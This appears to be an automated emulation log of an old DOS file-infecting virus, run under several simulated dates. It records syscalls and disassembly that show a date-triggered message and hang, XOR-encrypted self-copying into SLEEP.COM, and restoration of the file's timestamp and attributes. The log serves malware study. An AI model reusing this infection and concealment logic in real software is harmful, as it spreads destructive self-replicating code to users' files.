{"DateBased":true,"Day":27,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6165,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:58:40.14382076Z | 42 | PC: 12a72 | Get date 0x12a72: cmp dh, 8 0x12a75: jb 0x12a8b 0x12a77: cmp dl, 0x16 0x12a7a: jb 0x12a8b 0x12a7c: cmp al, 3 0x12a7e: jne 0x12a8b 0x12a80: mov ah, 9 0x12a82: lea dx, word ptr [bp + 0x134] 0x12a86: int 0x21 0x12a88: cli 0x12a89: jmp 0x12a88 0x12a8b: cmp dh, 5 0x12a8e: jae 0x12a93 0x12a90: jmp 0x12b46 0x12a93: mov ah, 0x1a 0x12a95: mov dx, 0xfc00 0x12a98: int 0x21 0x12a9a: mov ah, 0x4e 0x12a9c: lea dx, word ptr [bp + 0x12e] 0x12aa0: xor cx, cx |
| 2018-12-25T11:58:40.146427447Z | 9 | PC: 12a88 | Display string (String= ' RTL4 Joop van den Ende Produkties BV Marco Daas (Casting Assistent) Postbus 397 1430 AJ AALSMEER van Cleeffkade 15 1413 BA AALSMEER The Netherlands Wedden dat... je een virus hebt? ') |
{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6165,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:58:40.244731106Z | 42 | PC: 12a72 | Get date 0x12a72: cmp dh, 8 0x12a75: jb 0x12a8b 0x12a77: cmp dl, 0x16 0x12a7a: jb 0x12a8b 0x12a7c: cmp al, 3 0x12a7e: jne 0x12a8b 0x12a80: mov ah, 9 0x12a82: lea dx, word ptr [bp + 0x134] 0x12a86: int 0x21 0x12a88: cli 0x12a89: jmp 0x12a88 0x12a8b: cmp dh, 5 0x12a8e: jae 0x12a93 0x12a90: jmp 0x12b46 0x12a93: mov ah, 0x1a 0x12a95: mov dx, 0xfc00 0x12a98: int 0x21 0x12a9a: mov ah, 0x4e 0x12a9c: lea dx, word ptr [bp + 0x12e] 0x12aa0: xor cx, cx |
| 2018-12-25T11:58:40.247299858Z | 26 | PC: 12b4d | Set disk transfer address |
{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6165,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:58:40.748103395Z | 42 | PC: 12a72 | Get date 0x12a72: cmp dh, 8 0x12a75: jb 0x12a8b 0x12a77: cmp dl, 0x16 0x12a7a: jb 0x12a8b 0x12a7c: cmp al, 3 0x12a7e: jne 0x12a8b 0x12a80: mov ah, 9 0x12a82: lea dx, word ptr [bp + 0x134] 0x12a86: int 0x21 0x12a88: cli 0x12a89: jmp 0x12a88 0x12a8b: cmp dh, 5 0x12a8e: jae 0x12a93 0x12a90: jmp 0x12b46 0x12a93: mov ah, 0x1a 0x12a95: mov dx, 0xfc00 0x12a98: int 0x21 0x12a9a: mov ah, 0x4e 0x12a9c: lea dx, word ptr [bp + 0x12e] 0x12aa0: xor cx, cx |
| 2018-12-25T11:58:40.75115498Z | 26 | PC: 12a9a | Set disk transfer address |
| 2018-12-25T11:58:40.752110576Z | 78 | PC: 12aa4 | Find first file |
| 2018-12-25T11:58:40.757733506Z | 67 | PC: 12ab1 | Get or set file attributes |
| 2018-12-25T11:58:40.768173802Z | 67 | PC: 12ab9 | Get or set file attributes |
| 2018-12-25T11:58:40.789118712Z | 61 | PC: 12abe | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:58:40.800672419Z | 87 | PC: 12ac4 | Get or set file date and time |
| 2018-12-25T11:58:40.802907579Z | 63 | PC: 12ad1 | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-25T11:58:40.809258671Z | 66 | PC: 12af7 | Move file pointer |
| 2018-12-25T11:58:40.81075695Z | 44 | PC: 12b0a | Get time 0x12b0a: mov byte ptr cs:[bp + 0x17], dl 0x12b0f: lea si, word ptr [bp + 3] 0x12b13: mov di, 0xfd00 0x12b16: mov cx, 0x18 0x12b19: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1b: lea si, word ptr [bp + 0x1b] 0x12b1f: mov cx, 0x1e3 0x12b22: lodsb al, byte ptr [si] 0x12b23: xor al, dl 0x12b25: stosb byte ptr es:[di], al 0x12b26: loop 0x12b22 0x12b28: mov ah, 0x40 0x12b2a: mov dx, 0xfd00 0x12b2d: mov cx, 0x1fb 0x12b30: int 0x21 0x12b32: mov ax, 0x4200 0x12b35: call 0x22af1 0x12b38: mov ah, 0x40 0x12b3a: lea dx, word ptr [bp + 0x12b] 0x12b3e: mov cx, 4 |
| 2018-12-25T11:58:40.813111732Z | 64 | PC: 12b32 | Write file or device (Write 507 bytes on handle 5) |
| 2018-12-25T11:58:40.821055147Z | 66 | PC: 12af7 | Move file pointer (See above) |
| 2018-12-25T11:58:40.822353778Z | 64 | PC: 12b43 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-25T11:58:40.829023248Z | 87 | PC: 12b5c | Get or set file date and time |
| 2018-12-25T11:58:40.831165507Z | 62 | PC: 12b60 | Close file |
| 2018-12-25T11:58:40.838831801Z | 67 | PC: 12b69 | Get or set file attributes |
| 2018-12-25T11:58:40.848588855Z | 26 | PC: 12b4d | Set disk transfer address |
{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6165,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:58:41.195651155Z | 42 | PC: 12a72 | Get date 0x12a72: cmp dh, 8 0x12a75: jb 0x12a8b 0x12a77: cmp dl, 0x16 0x12a7a: jb 0x12a8b 0x12a7c: cmp al, 3 0x12a7e: jne 0x12a8b 0x12a80: mov ah, 9 0x12a82: lea dx, word ptr [bp + 0x134] 0x12a86: int 0x21 0x12a88: cli 0x12a89: jmp 0x12a88 0x12a8b: cmp dh, 5 0x12a8e: jae 0x12a93 0x12a90: jmp 0x12b46 0x12a93: mov ah, 0x1a 0x12a95: mov dx, 0xfc00 0x12a98: int 0x21 0x12a9a: mov ah, 0x4e 0x12a9c: lea dx, word ptr [bp + 0x12e] 0x12aa0: xor cx, cx |
| 2018-12-25T11:58:41.199145176Z | 26 | PC: 12a9a | Set disk transfer address |
| 2018-12-25T11:58:41.200673889Z | 78 | PC: 12aa4 | Find first file |
| 2018-12-25T11:58:41.207498302Z | 67 | PC: 12ab1 | Get or set file attributes |
| 2018-12-25T11:58:41.21386119Z | 67 | PC: 12ab9 | Get or set file attributes |
| 2018-12-25T11:58:41.230628395Z | 61 | PC: 12abe | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:58:41.237749783Z | 87 | PC: 12ac4 | Get or set file date and time |
| 2018-12-25T11:58:41.23928693Z | 63 | PC: 12ad1 | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-25T11:58:41.247927981Z | 66 | PC: 12af7 | Move file pointer |
| 2018-12-25T11:58:41.250403414Z | 44 | PC: 12b0a | Get time 0x12b0a: mov byte ptr cs:[bp + 0x17], dl 0x12b0f: lea si, word ptr [bp + 3] 0x12b13: mov di, 0xfd00 0x12b16: mov cx, 0x18 0x12b19: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1b: lea si, word ptr [bp + 0x1b] 0x12b1f: mov cx, 0x1e3 0x12b22: lodsb al, byte ptr [si] 0x12b23: xor al, dl 0x12b25: stosb byte ptr es:[di], al 0x12b26: loop 0x12b22 0x12b28: mov ah, 0x40 0x12b2a: mov dx, 0xfd00 0x12b2d: mov cx, 0x1fb 0x12b30: int 0x21 0x12b32: mov ax, 0x4200 0x12b35: call 0x22af1 0x12b38: mov ah, 0x40 0x12b3a: lea dx, word ptr [bp + 0x12b] 0x12b3e: mov cx, 4 |
| 2018-12-25T11:58:41.253113736Z | 64 | PC: 12b32 | Write file or device (Write 507 bytes on handle 5) |
| 2018-12-25T11:58:41.266960384Z | 66 | PC: 12af7 | Move file pointer (See above) |
| 2018-12-25T11:58:41.269097211Z | 64 | PC: 12b43 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-25T11:58:41.277891001Z | 87 | PC: 12b5c | Get or set file date and time |
| 2018-12-25T11:58:41.280087229Z | 62 | PC: 12b60 | Close file |
| 2018-12-25T11:58:41.289325575Z | 67 | PC: 12b69 | Get or set file attributes |
| 2018-12-25T11:58:41.303708304Z | 26 | PC: 12b4d | Set disk transfer address |
{"DateBased":true,"Day":22,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6165,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:58:41.25468871Z | 42 | PC: 12a72 | Get date 0x12a72: cmp dh, 8 0x12a75: jb 0x12a8b 0x12a77: cmp dl, 0x16 0x12a7a: jb 0x12a8b 0x12a7c: cmp al, 3 0x12a7e: jne 0x12a8b 0x12a80: mov ah, 9 0x12a82: lea dx, word ptr [bp + 0x134] 0x12a86: int 0x21 0x12a88: cli 0x12a89: jmp 0x12a88 0x12a8b: cmp dh, 5 0x12a8e: jae 0x12a93 0x12a90: jmp 0x12b46 0x12a93: mov ah, 0x1a 0x12a95: mov dx, 0xfc00 0x12a98: int 0x21 0x12a9a: mov ah, 0x4e 0x12a9c: lea dx, word ptr [bp + 0x12e] 0x12aa0: xor cx, cx |
| 2018-12-25T11:58:41.258304923Z | 26 | PC: 12a9a | Set disk transfer address |
| 2018-12-25T11:58:41.267415992Z | 78 | PC: 12aa4 | Find first file |
| 2018-12-25T11:58:41.277441721Z | 67 | PC: 12ab1 | Get or set file attributes |
| 2018-12-25T11:58:41.285097454Z | 67 | PC: 12ab9 | Get or set file attributes |
| 2018-12-25T11:58:41.310330008Z | 61 | PC: 12abe | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:58:41.318204806Z | 87 | PC: 12ac4 | Get or set file date and time |
| 2018-12-25T11:58:41.319625454Z | 63 | PC: 12ad1 | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-25T11:58:41.324853215Z | 66 | PC: 12af7 | Move file pointer |
| 2018-12-25T11:58:41.326037587Z | 44 | PC: 12b0a | Get time 0x12b0a: mov byte ptr cs:[bp + 0x17], dl 0x12b0f: lea si, word ptr [bp + 3] 0x12b13: mov di, 0xfd00 0x12b16: mov cx, 0x18 0x12b19: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1b: lea si, word ptr [bp + 0x1b] 0x12b1f: mov cx, 0x1e3 0x12b22: lodsb al, byte ptr [si] 0x12b23: xor al, dl 0x12b25: stosb byte ptr es:[di], al 0x12b26: loop 0x12b22 0x12b28: mov ah, 0x40 0x12b2a: mov dx, 0xfd00 0x12b2d: mov cx, 0x1fb 0x12b30: int 0x21 0x12b32: mov ax, 0x4200 0x12b35: call 0x22af1 0x12b38: mov ah, 0x40 0x12b3a: lea dx, word ptr [bp + 0x12b] 0x12b3e: mov cx, 4 |
| 2018-12-25T11:58:41.327729026Z | 64 | PC: 12b32 | Write file or device (Write 507 bytes on handle 5) |
| 2018-12-25T11:58:41.337688493Z | 66 | PC: 12af7 | Move file pointer (See above) |
| 2018-12-25T11:58:41.339131928Z | 64 | PC: 12b43 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-25T11:58:41.345146614Z | 87 | PC: 12b5c | Get or set file date and time |
| 2018-12-25T11:58:41.350729482Z | 62 | PC: 12b60 | Close file |
| 2018-12-25T11:58:41.358530704Z | 67 | PC: 12b69 | Get or set file attributes |
| 2018-12-25T11:58:41.367466245Z | 26 | PC: 12b4d | Set disk transfer address |